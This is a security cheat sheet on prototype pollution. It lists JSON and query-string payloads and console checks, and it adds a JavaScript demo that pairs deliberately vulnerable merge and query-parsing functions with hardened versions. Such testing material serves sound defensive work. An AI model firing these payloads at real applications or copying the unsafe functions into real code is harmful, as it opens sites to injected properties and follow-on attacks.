# Prototype pollution

## Server-side prototype pollution

### JSON-based input

```json
{
    "__proto__":{
        "evilProperty": "evilValue"
    }
}
```

```json
{
    "constructor": {
        "prototype": {
            "evilProperty": "evilValue"
        }
    }
}
```

### Tools

* [Server-side prototype pollution scanner (Burp extension)](https://github.com/portswigger/server-side-prototype-pollution)

## Client-side prototype pollution

```
example.com/?__proto__[evilProperty]=evilValue
example.com/?__proto__.evilProperty=evilValue
```

In the browser console, inspect `Object.prototype` to check whether the property has been successfully polluted.

```
Object.prototype
Object.prototype.evilProperty
```
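The following is an added example, not code from the original page: it shows how the JSON payloads from the server-side section and the query-string payloads from the client-side section reach `Object.prototype` through a naive recursive merge and a naive `a[b]=c` / `a.b=c` query parser, and how a key check plus a prototype-less result object stops them. All function names (`deepMergeUnsafe`, `parseQuerySafe`, `isPolluted`, and so on) are this example's own; only the payload strings come from the page.

```javascript
// Added example (not from the original page). Function names are this
// example's own; the payload strings are the ones shown on the page.

const POLLUTING_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isObjectLike(v) {
  return v !== null && (typeof v === "object" || typeof v === "function");
}

// --- Server-side: recursive merge of parsed JSON into a config object ------

// Vulnerable: follows whatever target[key] resolves to, so "__proto__"
// resolves to Object.prototype, and "constructor" -> "prototype" does too.
function deepMergeUnsafe(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isObjectLike(value)) {
      if (!isObjectLike(target[key])) target[key] = {};
      deepMergeUnsafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: rejects the three keys that reach a prototype and only recurses
// into the target's own properties, never into inherited ones.
function deepMergeSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (POLLUTING_KEYS.has(key)) {
      throw new Error(`rejected prototype-polluting key: ${key}`);
    }
    const value = source[key];
    if (isObjectLike(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isObjectLike(target[key])) target[key] = {};
      deepMergeSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// --- Client-side: "?a[b]=c" / "?a.b=c" style query parsing -----------------

// Splits "?k1[k2]=v&k3.k4=w" into [[["k1","k2"],"v"], [["k3","k4"],"w"]].
function splitQuery(search) {
  const pairs = [];
  for (const pair of search.replace(/^\?/, "").split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? "" : pair.slice(eq + 1);
    const path = decodeURIComponent(rawKey).replace(/\]/g, "").split(/\[|\./);
    pairs.push([path, decodeURIComponent(rawVal)]);
  }
  return pairs;
}

// Vulnerable: node["__proto__"] resolves to Object.prototype, so the path
// ["__proto__", "evilProperty"] writes straight onto it.
function parseQueryUnsafe(search) {
  const out = {};
  for (const [path, value] of splitQuery(search)) {
    let node = out;
    for (const key of path.slice(0, -1)) {
      if (!isObjectLike(node[key])) node[key] = {};
      node = node[key];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// Hardened: drops any pair whose path contains a polluting key and builds
// the result on prototype-less objects, so there is no prototype to reach.
function parseQuerySafe(search) {
  const out = Object.create(null);
  for (const [path, value] of splitQuery(search)) {
    if (path.some((k) => POLLUTING_KEYS.has(k))) continue;
    let node = out;
    for (const key of path.slice(0, -1)) {
      if (!isObjectLike(node[key])) node[key] = Object.create(null);
      node = node[key];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// Same check as typing `Object.prototype.evilProperty` in the console:
// does a fresh empty object inherit the property?
function isPolluted(prop) {
  return prop in {};
}

// Cleanup so each run starts from a clean prototype.
function unpollute(prop) {
  delete Object.prototype[prop];
}

// Runs the page's payloads through each variant and reports what polluted.
function demo() {
  const jsonProto = '{"__proto__":{"evilProperty":"evilValue"}}';
  const jsonCtor = '{"constructor":{"prototype":{"evilProperty":"evilValue"}}}';
  const query = "?__proto__[evilProperty]=evilValue";
  const out = {};
  unpollute("evilProperty");
  deepMergeUnsafe({}, JSON.parse(jsonProto));
  out.unsafeMergeProto = isPolluted("evilProperty");
  unpollute("evilProperty");
  deepMergeUnsafe({}, JSON.parse(jsonCtor));
  out.unsafeMergeCtor = isPolluted("evilProperty");
  unpollute("evilProperty");
  try { deepMergeSafe({}, JSON.parse(jsonProto)); } catch (e) { out.safeMergeRejected = true; }
  out.safeMergeProto = isPolluted("evilProperty");
  parseQueryUnsafe(query);
  out.unsafeQuery = isPolluted("evilProperty");
  unpollute("evilProperty");
  parseQuerySafe(query);
  out.safeQuery = isPolluted("evilProperty");
  return out;
}

console.log(demo());
```

Running the block prints `unsafeMergeProto`, `unsafeMergeCtor` and `unsafeQuery` as `true` and `safeMergeProto` and `safeQuery` as `false`. The `constructor.prototype` variant only works against a merge that is willing to recurse into a function value (`Object`), which is why `isObjectLike` accepts functions; a merge that only recurses into plain objects is still reachable through `__proto__`, so the key check is the mitigation that covers both shapes.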

### Tools

* [DOM Invader (Burp Suite)](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)
